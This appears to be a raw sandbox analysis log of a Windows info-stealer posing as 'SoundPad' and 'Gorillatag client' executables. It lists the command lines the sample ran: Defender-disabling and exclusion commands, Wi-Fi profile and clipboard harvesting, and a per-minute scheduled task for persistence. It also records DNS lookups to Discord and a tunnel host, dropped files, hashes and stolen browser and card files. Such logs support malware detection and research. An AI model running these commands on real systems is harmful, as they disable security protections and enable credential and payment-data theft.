C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Gorillatag client.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Gorillatag client.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Gorillatag client" /tr "C:\Users\Admin\Gorillatag client.exe"

C:\Users\Admin\Gorillatag client.exe

"C:\Users\Admin\Gorillatag client.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 8.8.8.8:53 19.ip.gl.ply.gg udp

Files

memory/4628-0-0x00007FFB19510000-0x00007FFB19FD2000-memory.dmp

memory/4628-1-0x0000000000A70000-0x0000000001A72000-memory.dmp

C:\Users\Admin\SoundPad.exe

MD5 3b184b0bf9cae37d5a3f0025c43791f9
SHA1 4d384b79ec9bbef8cbc3ad85ee49914dca03888c
SHA256 b13f82bc8c09dd45d7cc4026ff2b9bb16ec302eef90bdb22e66bd8c9287b695f
SHA512 5d5e7030f49dff50933c1438f38c7dbdfd1e95b0e8155b4f16b2f6a205c6feff440c92588f0440ed543577dc2f25eabacd39730937a83615e01b5e798a19d51c

C:\Users\Admin\XClient.exe

MD5 b8a5902712f0159c808d05982f3f099f
SHA1 b5bc99d9f751a6d8618453761f6f1db7eb4ead59
SHA256 0325350841de44656ec17462500221ce09a1fd617cb56d1770a1ca6490b03713
SHA512 2b832adeadd64f094e7b83a29309636d4f2e8e2f8bdc9c798591d0f03874e7b02a0d26e940f8ceb709517be4d9ae771f12a7bab89b9c86f14d0229a7128a3d4d

memory/2072-100-0x00007FFB19510000-0x00007FFB19FD2000-memory.dmp

memory/2072-110-0x0000000000370000-0x0000000000386000-memory.dmp

memory/4628-108-0x00007FFB19510000-0x00007FFB19FD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI46882\python312.dll

MD5 2889fb28cd8f2f32997be99eb81fd7eb
SHA1 adfeb3a08d20e22dde67b60869c93291ca688093
SHA256 435430e3abfde589d8535bc24a4b1d4147a4971dbe59e9377603974c07a1b637
SHA512 aaa33b8178a8831008ea6ad39b05189d55aa228a20a2315e45df6e2ff590c94478cfc76c9adb762689edb021ecdf98df3e7074d8d65c1c477273056b7509f8ee

C:\Users\Admin\AppData\Local\Temp\_MEI46882\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/4984-146-0x00007FFB15580000-0x00007FFB15C59000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_ctypes.pyd

MD5 76288ffffdce92111c79636f71b9bc9d
SHA1 15c10dcd31dab89522bf5b790e912dc7e6b3183b
SHA256 192cc2ac818c78cd21e9f969a95c0ff777d4cd5f79ae51ab7c366d2b8540f6a1
SHA512 29efc143cd72bf886e9bf54463706484f22222f024bd7e8cb206c32f40b76d823efd36061b05bbd6bcf562f83d95449acb3f1440c95e63750c643c15a10816c9

C:\Users\Admin\AppData\Local\Temp\_MEI46882\python3.dll

MD5 6271a2fe61978ca93e60588b6b63deb2
SHA1 be26455750789083865fe91e2b7a1ba1b457efb8
SHA256 a59487ea2c8723277f4579067248836b216a801c2152efb19afee4ac9785d6fb
SHA512 8c32bcb500a94ff47f5ef476ae65d3b677938ebee26e80350f28604aaee20b044a5d55442e94a11ccd9962f34d22610b932ac9d328197cf4d2ffbc7df640efba

C:\Users\Admin\AppData\Local\Temp\_MEI46882\base_library.zip

MD5 630153ac2b37b16b8c5b0dbb69a3b9d6
SHA1 f901cd701fe081489b45d18157b4a15c83943d9d
SHA256 ec4e6b8e9f6f1f4b525af72d3a6827807c7a81978cb03db5767028ebea283be2
SHA512 7e3a434c8df80d32e66036d831cbd6661641c0898bd0838a07038b460261bf25b72a626def06d0faa692caf64412ca699b1fa7a848fe9d969756e097cba39e41

C:\Users\Admin\AppData\Local\Temp\_MEI46882\libffi-8.dll

MD5 bb1feaa818eba7757ada3d06f5c57557
SHA1 f2de5f06dc6884166de165d34ef2b029bb0acf8b
SHA256 a7ac89b42d203ad40bad636ad610cf9f6da02128e5a20b8b4420530a35a4fb29
SHA512 95dd1f0c482b0b0190e561bc08fe58db39fd8bb879a2dec0cabd40d78773161eb76441a9b1230399e3add602685d0617c092fff8bf0ab6903b537a9382782a97

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_bz2.pyd

MD5 f991618bfd497e87441d2628c39ea413
SHA1 98819134d64f44f83a18985c2ec1e9ee8b949290
SHA256 333c06fad79094d43465d128d68078296c925d1ea2b6b5bf13072a8d5cb65e7e
SHA512 3a9ecb293abedcdba3493feb7d19f987735ced5a5194abaa1d1e00946e7ea0f878dd71868eb3d9bfec80432df862367661b825c9e71409c60ec73d1708a63ef6

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_lzma.pyd

MD5 f07f0cfe4bc118aebcde63740635a565
SHA1 44ee88102830434bb9245934d6d4456c77c7b649
SHA256 cc5302895aa164d5667d0df3ebeeee804384889b01d38182b3f7179f3c4ff8c0
SHA512 fcd701903ccd454a661c27835b53f738d947f38e9d67620f52f12781a293e42ae6b96c260600396883d95dd5f536dba2874aaee083adbcc78d66873cefc8e99d

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_uuid.pyd

MD5 7a00ff38d376abaaa1394a4080a6305b
SHA1 d43a9e3aa3114e7fc85c851c9791e839b3a0ee13
SHA256 720e9b68c41c8d9157865e4dd243fb1731f627f3af29c43250804a5995a82016
SHA512 ce39452df539eeeff390f260c062a0c902557fda25a7be9a58274675b82b30bddb7737b242e525f7d501db286f4873b901d94e1cd09aa8864f052594f4b34789

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_wmi.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI46882\select.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_socket.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_ssl.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_sqlite3.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_queue.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_overlapped.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_multiprocessing.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_hashlib.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_decimal.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_cffi_backend.cp312-win_amd64.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_asyncio.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI46882\VCRUNTIME140_1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI46882\unicodedata.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI46882\sqlite3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI46882\pyexpat.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI46882\libssl-3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI46882\libcrypto-3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI46882\psutil\_psutil_windows.pyd

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dyeuz05c.ybq.ps1

C:\Users\Admin\AppData\Local\Temp\_MEI46882\charset_normalizer\md__mypyc.cp312-win_amd64.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI46882\Cryptodome\Cipher\_raw_ecb.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI46882\Cryptodome\Cipher\_raw_cbc.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI46882\charset_normalizer\md.cp312-win_amd64.pyd

C:\Users\Admin\AppData\Local\Temp\0NfxoOQrtB\Browser\history.txt

C:\Users\Admin\AppData\Local\Temp\0NfxoOQrtB\Browser\cc's.txt
